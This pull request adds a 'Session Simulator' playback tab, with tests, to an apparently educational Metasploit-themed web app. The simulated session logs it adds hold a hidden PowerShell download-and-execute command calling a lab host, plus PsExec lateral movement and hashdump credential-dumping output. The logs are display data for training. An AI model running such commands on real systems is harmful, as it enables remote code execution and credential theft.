### PR TITLE
[metasploit] add session simulator playback

### DIFF
--- a/__tests__/apps/metasploit/session-simulator.test.tsx
+++ b/__tests__/apps/metasploit/session-simulator.test.tsx
@@ -1,0 +1,66 @@
+import React from 'react';
+import { act, fireEvent, render, screen } from '@testing-library/react';
+
+// eslint-disable-next-line @typescript-eslint/ban-ts-comment
+// @ts-ignore importing jsx module for tests
+import MetasploitApp from '../../../components/apps/metasploit/metasploit.jsx';
+import SessionSimulator from '../../../components/apps/metasploit/SessionSimulator';
+
+describe('SessionSimulator', () => {
+  beforeEach(() => {
+    jest.useRealTimers();
+    localStorage.clear();
+    // @ts-ignore
+    global.fetch = jest.fn(() =>
+      Promise.resolve({
+        json: () => Promise.resolve({ loot: [], notes: [] }),
+      }),
+    );
+  });
+
+  it('updates output when seeking to a later timestamp', () => {
+    render(<SessionSimulator />);
+
+    expect(
+      screen.getByText(/msf6 exploit\(multi\/script\/web_delivery\) > run/i),
+    ).toBeInTheDocument();
+
+    const slider = screen.getByRole('slider', { name: /seek session timeline/i });
+    fireEvent.change(slider, { target: { value: '21' } });
+
+    expect(
+      screen.getByText(/Meterpreter session 4 opened/),
+    ).toBeInTheDocument();
+  });
+
+  it('persists playback state when switching tabs', async () => {
+    jest.useFakeTimers();
+
+    render(<MetasploitApp demoMode />);
+
+    const sessionTab = screen.getByRole('tab', { name: /session simulator/i });
+    fireEvent.click(sessionTab);
+
+    const playButton = screen.getByRole('button', { name: /play session playback/i });
+    fireEvent.click(playButton);
+
+    await act(async () => {
+      jest.advanceTimersByTime(26000);
+    });
+
+    expect(
+      screen.getByText(/Meterpreter session 4 opened/),
+    ).toBeInTheDocument();
+
+    const consoleTab = screen.getByRole('tab', { name: /console/i });
+    fireEvent.click(consoleTab);
+
+    fireEvent.click(sessionTab);
+
+    expect(
+      screen.getByText(/Meterpreter session 4 opened/),
+    ).toBeInTheDocument();
+
+    jest.useRealTimers();
+  });
+});

--- a/components/apps/metasploit/SessionSimulator.tsx
+++ b/components/apps/metasploit/SessionSimulator.tsx
@@ -1,0 +1,269 @@
+'use client';
+
+import React, { useEffect, useMemo, useState, useRef } from 'react';
+import clsx from 'clsx';
+
+import webDelivery from './logs/web_delivery.json';
+import lateralMovement from './logs/lateral_movement.json';
+
+interface SessionEvent {
+  timestamp: number;
+  output: string;
+}
+
+interface SessionLog {
+  id: string;
+  title: string;
+  description: string;
+  events: SessionEvent[];
+}
+
+const LOGS: SessionLog[] = [
+  webDelivery as SessionLog,
+  lateralMovement as SessionLog,
+];
+
+const formatTime = (seconds: number) => {
+  const totalSeconds = Math.max(0, seconds);
+  const mins = Math.floor(totalSeconds / 60);
+  const secs = Math.floor(totalSeconds % 60);
+  return `${mins.toString().padStart(2, '0')}:${secs.toString().padStart(2, '0')}`;
+};
+
+interface SandboxedTerminalProps {
+  lines: string[];
+  className?: string;
+}
+
+const SandboxedTerminal = React.forwardRef<HTMLDivElement, SandboxedTerminalProps>(
+  ({ lines, className }, ref) => (
+    <div
+      ref={ref}
+      role="log"
+      aria-live="polite"
+      aria-relevant="additions"
+      className={clsx(
+        'h-full w-full overflow-auto rounded border border-gray-700 bg-black p-2 font-mono text-sm text-green-300',
+        className,
+      )}
+    >
+      {lines.length ? (
+        <ol className="space-y-1">
+          {lines.map((line, idx) => (
+            <li key={`${idx}-${line}`}>{line || '\u00A0'}</li>
+          ))}
+        </ol>
+      ) : (
+        <p>No output yet.</p>
+      )}
+    </div>
+  ),
+);
+
+SandboxedTerminal.displayName = 'SandboxedTerminal';
+
+export interface SessionSimulatorProps {
+  isActive?: boolean;
+}
+
+interface PlaybackState {
+  logId: string;
+  currentTime: number;
+  isPlaying: boolean;
+  speed: number;
+}
+
+const defaultState: PlaybackState = {
+  logId: LOGS[0]?.id ?? '',
+  currentTime: 0,
+  isPlaying: false,
+  speed: 1,
+};
+
+const clampTime = (log: SessionLog, value: number) => {
+  if (!log.events.length) return 0;
+  const last = log.events[log.events.length - 1].timestamp;
+  return Math.min(Math.max(0, value), last);
+};
+
+const SessionSimulator: React.FC<SessionSimulatorProps> = ({ isActive = true }) => {
+  const [state, setState] = useState<PlaybackState>(() => ({ ...defaultState }));
+  const terminalRef = useRef<HTMLDivElement | null>(null);
+
+  const logsById = useMemo(() => {
+    const map = new Map<string, SessionLog>();
+    LOGS.forEach((log) => {
+      map.set(log.id, log);
+    });
+    return map;
+  }, []);
+
+  const currentLog = logsById.get(state.logId) ?? LOGS[0];
+  const duration = currentLog?.events.length
+    ? currentLog.events[currentLog.events.length - 1].timestamp
+    : 0;
+
+  useEffect(() => {
+    if (!currentLog) return;
+    setState((prev) => {
+      if (!prev.logId && currentLog) {
+        return { ...prev, logId: currentLog.id };
+      }
+      const clampedTime = clampTime(currentLog, prev.currentTime);
+      if (clampedTime !== prev.currentTime) {
+        return { ...prev, currentTime: clampedTime, isPlaying: false };
+      }
+      return prev;
+    });
+  }, [currentLog]);
+
+  useEffect(() => {
+    if (!state.isPlaying || !isActive || !currentLog || !duration) return;
+    const interval = window.setInterval(() => {
+      setState((prev) => {
+        const activeLog = logsById.get(prev.logId) ?? currentLog;
+        if (!activeLog.events.length) {
+          return { ...prev, isPlaying: false, currentTime: 0 };
+        }
+        const last = activeLog.events[activeLog.events.length - 1].timestamp;
+        const next = prev.currentTime + 0.1 * prev.speed;
+        if (next >= last) {
+          return { ...prev, currentTime: last, isPlaying: false };
+        }
+        if (next === prev.currentTime) {
+          return prev;
+        }
+        return { ...prev, currentTime: Number(next.toFixed(2)) };
+      });
+    }, 100);
+    return () => window.clearInterval(interval);
+  }, [state.isPlaying, state.speed, state.logId, isActive, currentLog, duration, logsById]);
+
+  const lines = useMemo(() => {
+    if (!currentLog) return [];
+    return currentLog.events
+      .filter((event) => event.timestamp <= state.currentTime + 1e-3)
+      .map((event) => event.output);
+  }, [currentLog, state.currentTime]);
+
+  useEffect(() => {
+    if (terminalRef.current) {
+      terminalRef.current.scrollTop = terminalRef.current.scrollHeight;
+    }
+  }, [lines.length]);
+
+  if (!currentLog) {
+    return (
+      <div className="p-4 text-sm text-white">
+        <p>No session logs available.</p>
+      </div>
+    );
+  }
+
+  const handlePlayPause = () => {
+    setState((prev) => {
+      if (prev.isPlaying) {
+        return { ...prev, isPlaying: false };
+      }
+      const log = logsById.get(prev.logId) ?? currentLog;
+      const last = log.events.length ? log.events[log.events.length - 1].timestamp : 0;
+      const time = prev.currentTime >= last ? 0 : prev.currentTime;
+      return { ...prev, currentTime: time, isPlaying: true };
+    });
+  };
+
+  const handleSeek = (value: number) => {
+    const log = logsById.get(state.logId) ?? currentLog;
+    const next = clampTime(log, value);
+    setState((prev) => ({ ...prev, currentTime: next }));
+  };
+
+  const handleSpeedChange = (value: number) => {
+    setState((prev) => ({ ...prev, speed: value }));
+  };
+
+  const handleLogChange = (id: string) => {
+    const nextLog = logsById.get(id);
+    if (!nextLog) return;
+    setState({ logId: id, currentTime: 0, isPlaying: false, speed: 1 });
+  };
+
+  return (
+    <div className="flex h-full flex-col bg-black/70 text-white">
+      <header className="flex flex-col gap-2 border-b border-gray-700 p-3 text-sm">
+        <div className="flex flex-wrap items-center gap-2">
+          <h3 className="text-base font-semibold">Session Simulator</h3>
+          <span className="rounded bg-ub-orange px-2 py-0.5 text-xs text-black">
+            Training Mode
+          </span>
+        </div>
+        <p className="text-xs text-gray-300">{currentLog.description}</p>
+        <div className="flex flex-wrap items-center gap-3 text-xs">
+          <label className="flex items-center gap-2">
+            <span className="text-gray-300">Session:</span>
+            <select
+              aria-label="Session log"
+              value={currentLog.id}
+              onChange={(e) => handleLogChange(e.target.value)}
+              className="rounded border border-gray-700 bg-black px-2 py-1 text-white"
+            >
+              {LOGS.map((log) => (
+                <option key={log.id} value={log.id}>
+                  {log.title}
+                </option>
+              ))}
+            </select>
+          </label>
+          <label className="flex items-center gap-2">
+            <span className="text-gray-300">Speed:</span>
+            <select
+              aria-label="Playback speed"
+              value={state.speed}
+              onChange={(e) => handleSpeedChange(Number(e.target.value))}
+              className="rounded border border-gray-700 bg-black px-2 py-1 text-white"
+            >
+              <option value={0.5}>0.5x</option>
+              <option value={1}>1x</option>
+              <option value={1.5}>1.5x</option>
+              <option value={2}>2x</option>
+            </select>
+          </label>
+          <div className="ml-auto flex items-center gap-3">
+            <button
+              type="button"
+              onClick={handlePlayPause}
+              className="rounded bg-ub-orange px-3 py-1 text-xs font-semibold text-black"
+              aria-label={state.isPlaying ? 'Pause session playback' : 'Play session playback'}
+            >
+              {state.isPlaying ? 'Pause' : 'Play'}
+            </button>
+            <div className="flex items-center gap-2 text-gray-300">
+              <span aria-label="Elapsed time" className="font-mono text-sm">
+                {formatTime(state.currentTime)}
+              </span>
+              <span className="text-gray-500">/</span>
+              <span aria-label="Session duration" className="font-mono text-sm">
+                {formatTime(duration)}
+              </span>
+            </div>
+          </div>
+        </div>
+        <input
+          type="range"
+          min={0}
+          max={duration || 0}
+          step={0.1}
+          value={state.currentTime}
+          onChange={(e) => handleSeek(Number(e.target.value))}
+          aria-label="Seek session timeline"
+          className="w-full"
+        />
+      </header>
+      <div className="flex-1 p-3">
+        <SandboxedTerminal ref={terminalRef} lines={lines} />
+      </div>
+    </div>
+  );
+};
+
+export default SessionSimulator;

--- a/components/apps/metasploit/logs/lateral_movement.json
+++ b/components/apps/metasploit/logs/lateral_movement.json
@@ -1,0 +1,35 @@
+{
+  "id": "lateral_movement",
+  "title": "SMB PsExec Lateral Movement",
+  "description": "Demonstration of using PsExec against a lab server after credential reuse.",
+  "events": [
+    { "timestamp": 0, "output": "msf6 exploit(windows/smb/psexec) > run" },
+    { "timestamp": 2, "output": "[*] Started reverse TCP handler on 10.10.0.5:4444" },
+    { "timestamp": 4.5, "output": "[*] 10.10.0.45:445 - Connecting to the server..." },
+    {
+      "timestamp": 7.4,
+      "output": "[*] 10.10.0.45:445 - Authenticating to 10.10.0.45:445 as domain\\\\ops"
+    },
+    { "timestamp": 10.3, "output": "[+] 10.10.0.45:445 - Authentication successful" },
+    {
+      "timestamp": 12.8,
+      "output": "[*] 10.10.0.45:445 - Uploading payload...  (\\\\WINDOWS\\\\system32\\\\spool\\\\drivers\\\\color\\\\RZsUsv.exe)"
+    },
+    { "timestamp": 16.2, "output": "[*] 10.10.0.45:445 - Executing the payload..." },
+    { "timestamp": 19.6, "output": "[+] 10.10.0.45:445 - Service started successfully..." },
+    { "timestamp": 22.4, "output": "[*] Sending stage (175174 bytes) to 10.10.0.45" },
+    {
+      "timestamp": 25.1,
+      "output": "[*] Meterpreter session 5 opened (10.10.0.5:4444 -> 10.10.0.45:49873)"
+    },
+    { "timestamp": 28.5, "output": "meterpreter > ps" },
+    { "timestamp": 33.2, "output": "PID   PPID  Name               Arch  Session  User" },
+    { "timestamp": 36, "output": "----  ----  -----------------  ----  -------  ----------------" },
+    { "timestamp": 40.7, "output": "1234  456   lsass.exe          x64   0        NT AUTHORITY\\\\SYSTEM" },
+    { "timestamp": 44.5, "output": "meterpreter > hashdump" },
+    { "timestamp": 49, "output": "[*] Obtaining the boot key..." },
+    { "timestamp": 52.7, "output": "[*] Calculating the hboot key using SYSKEY 9a4e1..." },
+    { "timestamp": 56.3, "output": "[*] Dumping password hashes..." },
+    { "timestamp": 60, "output": "[+] 10.10.0.45:445 - Extracted 4 password hashes" }
+  ]
+}

--- a/components/apps/metasploit/logs/web_delivery.json
+++ b/components/apps/metasploit/logs/web_delivery.json
@@ -1,0 +1,31 @@
+{
+  "id": "web_delivery",
+  "title": "Web Delivery against Demo Workstation",
+  "description": "Simulated meterpreter session resulting from a web_delivery payload executed on a lab workstation.",
+  "events": [
+    { "timestamp": 0, "output": "msf6 exploit(multi/script/web_delivery) > run" },
+    { "timestamp": 1.2, "output": "[*] Using URL: http://0.0.0.0:8080/7x3F" },
+    { "timestamp": 3.4, "output": "[*] Server started." },
+    { "timestamp": 6.8, "output": "[*] Run the following command on the target:" },
+    {
+      "timestamp": 8.5,
+      "output": "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.0.5:8080/7x3F')\""
+    },
+    {
+      "timestamp": 14.1,
+      "output": "[*] 10.10.0.42     web_delivery - Handling request for /7x3F"
+    },
+    { "timestamp": 17.3, "output": "[*] Sending stage (175174 bytes) to 10.10.0.42" },
+    {
+      "timestamp": 20.9,
+      "output": "[*] Meterpreter session 4 opened (10.10.0.5:4444 -> 10.10.0.42:49726)"
+    },
+    { "timestamp": 24.5, "output": "meterpreter > getuid" },
+    { "timestamp": 26, "output": "Server username: CONTOSO\\\\lab-admin" },
+    { "timestamp": 29.2, "output": "meterpreter > sysinfo" },
+    { "timestamp": 31.7, "output": "Computer        : DEMO-WKS01" },
+    { "timestamp": 34, "output": "OS              : Windows 10 (10.0 Build 19045)." },
+    { "timestamp": 38.5, "output": "meterpreter > background" },
+    { "timestamp": 40.1, "output": "[*] Backgrounding session 4..." }
+  ]
+}

--- a/components/apps/metasploit/metasploit.jsx
+++ b/components/apps/metasploit/metasploit.jsx
@@ -2,6 +2,7 @@ import React, { useEffect, useMemo, useRef, useState } from 'react';
 import modules from './modules.json';
 import usePersistentState from '../../../hooks/usePersistentState';
 import ConsolePane from './ConsolePane';
+import SessionSimulator from './SessionSimulator';
 
 const severities = ['critical', 'high', 'medium', 'low'];
 const severityStyles = {
@@ -43,6 +44,11 @@ const MetasploitApp = ({
   const [timeline, setTimeline] = useState([]);
   const [replaying, setReplaying] = useState(false);
   const [progress, setProgress] = useState(0);
+  const [activeTab, setActiveTab] = usePersistentState(
+    'metasploit-active-tab',
+    'console',
+    (value) => value === 'console' || value === 'session',
+  );
 
   useEffect(() => {
     onLoadingChange(loading);
@@ -279,7 +285,7 @@ const MetasploitApp = ({
       <div className="bg-yellow-400 text-black text-xs p-2 text-center">
         For authorized security testing and educational use only.
       </div>
-      <div className="flex p-2">
+      <div className="flex flex-1 min-h-0 p-2">
         <input
           className="flex-grow bg-ub-grey text-white p-1 rounded"
           value={command}
@@ -567,7 +573,62 @@ const MetasploitApp = ({
           )}
         </aside>
       </div>
-      <ConsolePane output={loading ? 'Running...' : output} />
+      <div className="mt-2 flex min-h-[14rem] flex-col rounded-t border-t border-gray-700 bg-ub-grey/40">
+        <div
+          role="tablist"
+          aria-label="Metasploit views"
+          className="flex divide-x divide-gray-700 border-b border-gray-700 bg-ub-grey/60 text-xs"
+        >
+          <button
+            type="button"
+            role="tab"
+            id="metasploit-tab-console"
+            aria-controls="metasploit-panel-console"
+            aria-selected={activeTab === 'console'}
+            onClick={() => setActiveTab('console')}
+            className={`flex-1 px-3 py-2 font-semibold transition-colors ${
+              activeTab === 'console'
+                ? 'bg-black/60 text-white'
+                : 'text-gray-300 hover:text-white'
+            }`}
+          >
+            Console
+          </button>
+          <button
+            type="button"
+            role="tab"
+            id="metasploit-tab-session"
+            aria-controls="metasploit-panel-session"
+            aria-selected={activeTab === 'session'}
+            onClick={() => setActiveTab('session')}
+            className={`flex-1 px-3 py-2 font-semibold transition-colors ${
+              activeTab === 'session'
+                ? 'bg-black/60 text-white'
+                : 'text-gray-300 hover:text-white'
+            }`}
+          >
+            Session Simulator
+          </button>
+        </div>
+        <section
+          role="tabpanel"
+          id="metasploit-panel-console"
+          aria-labelledby="metasploit-tab-console"
+          hidden={activeTab !== 'console'}
+          className="flex flex-1 flex-col min-h-0"
+        >
+          <ConsolePane output={loading ? 'Running...' : output} />
+        </section>
+        <section
+          role="tabpanel"
+          id="metasploit-panel-session"
+          aria-labelledby="metasploit-tab-session"
+          hidden={activeTab !== 'session'}
+          className="flex flex-1 flex-col min-h-0"
+        >
+          <SessionSimulator isActive={activeTab === 'session'} />
+        </section>
+      </div>
     </div>
   );
 };


### PR DESCRIPTION
## Summary
- add a sandboxed SessionSimulator with playback controls and sample session logs
- expose the simulator alongside the console via new tabs that persist the active view
- cover seeking and tab-persistence behaviour with new Jest tests

## Testing
- yarn lint *(fails: existing repo lint violations unrelated to this change)*
- yarn test __tests__/apps/metasploit/session-simulator.test.tsx

------
https://chatgpt.com/codex/tasks/task_e_68cc282ac4cc8328b38ec4fd0be6e577